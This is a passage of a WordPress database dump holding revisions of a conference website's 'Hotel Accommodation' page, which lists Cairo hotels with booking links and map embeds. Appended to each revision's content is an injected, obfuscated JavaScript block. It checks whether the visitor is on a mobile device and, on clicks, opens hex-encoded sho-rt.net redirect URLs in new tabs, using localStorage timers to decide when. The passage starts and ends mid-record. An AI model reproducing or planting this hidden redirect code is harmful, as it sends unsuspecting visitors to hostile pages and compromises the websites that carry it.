Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 22:11:29','2023-07-18 22:11:29','',2685,'https://gsw2023.com/?p=5014',0,'revision','',0),
(5015,1,'2023-07-18 22:13:30','2023-07-18 22:13:30','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 22:13:30','2023-07-18 22:13:30','',2685,'https://gsw2023.com/?p=5015',0,'revision','',0),
(5016,1,'2023-07-18 22:22:47','2023-07-18 22:22:47','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" 